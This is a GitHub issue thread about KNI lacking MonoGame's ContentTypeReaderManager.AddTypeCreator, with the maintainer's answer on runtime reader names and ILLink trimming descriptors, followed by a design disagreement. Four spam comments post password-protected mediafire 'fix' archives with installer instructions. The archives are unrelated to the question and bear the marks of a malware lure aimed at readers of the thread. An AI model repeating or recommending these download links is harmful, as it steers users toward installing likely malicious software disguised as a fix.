### ISSUE TITLE
Missing MonoGame ContentTypeReaderManager.AddTypeCreator method 

### ISSUE THREAD

**Issue by dtaylorus** [kniEngine/kni#1796]
I'm trying to port my game from MonoGame and one of the things I'm missing is the `ContentTypeReaderManager.AddTypeCreator` method which I used to avoid reflection when loading content types.

Is there some alternative way to accomplish this in KNI?

Thanks!

#### What version of KNI does the bug occur on:
- KNI 3.13.9001

#### What operating system are you using:
- Windows11

#### What KNI platform are you using:

- BlazorGL

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by nkast** [comment]
That method is not needed. 

To address the two issue you brought up...

The ContentTypeWriter must return the type name and assembly name from GetRuntimeReader().
e.g.
```
        public override string GetRuntimeReader(TargetPlatform targetPlatform)
        {
            return "nkast.Aether.Physics2D.Content.PolygonContainerReader, Aether.Physics2D.Content";
        }
```

To address the issue with reflection on AOT/Trimmed programs you can can either  
disable trimming for your assembly or add an exclusion in a ILLink.Descriptors.xml file. 
e.g. 
 ILLink.Descriptors.xml 
```
<linker>
  <assembly fullname="Aether.Physics2D.Content" >
	  <type fullname="nkast.Aether.Physics2D.Content.PolygonContainerReader" preserve="all" />
  </assembly>
</linker>
```

then in you .csproj file enable trimming with 
`<IsTrimmable Condition="$([MSBuild]::IsTargetFrameworkCompatible('$(TargetFramework)', 'net8.0'))">true</IsTrimmable>`
and add a reference to the LLink.Descriptors
```
  <ItemGroup>
    <EmbeddedResource Include="ILLink.Descriptors.xml">
      <LogicalName>ILLink.Descriptors.xml</LogicalName>
    </EmbeddedResource>
  </ItemGroup>
```

**Comment by dtaylorus** [comment]
Thank you for the response. However, I don't think this addresses my issue.

To make it concrete, the content writer is in one assembly, e.g., `MyContentPipeline.dll`. The content reader is compiled into my game. It is not in a separate assembly, so the assembly name is different for every game, e.g., it is in `MyGame.exe`.

The content writer is used by multiple games. So at the time the content is written, the eventual reader assembly is not known.

MonoGame makes it very easy to support this scenario with the `AddTypeCreator `method, which I can include in shared code used by every game without any concern for which assembly contains the shared code.

As a side benefit, the entire content pipeline is greatly simplified without reflection or the need for complicated trimming configuration. This is a really nice feature in MonoGame and it would be great to have in KNI as well.

Thanks for your consideration!

**Comment by nkast** [comment]
You have to walk the extra mile and make a proper library for your common code. 

I'll not include any unnecessary shortcuts in the library.

**Comment by dtaylorus** [comment]
I don't consider it a shortcut. Rather, it is solving a fundamental flaw with the XNA content pipeline. It should not be necessary to use reflection to load content, nor should it be necessary to reference external assemblies and deal with all of the linking nightmares that ensue.

But you're the engine owner and unfortunately MonoGame still doesn't have a web solution, so if you disagree, feel free to close this issue and I'll just maintain my own fork. I still very much appreciate being able to run my MonoGame code on the web, even if I have to maintain my own fork to do so.
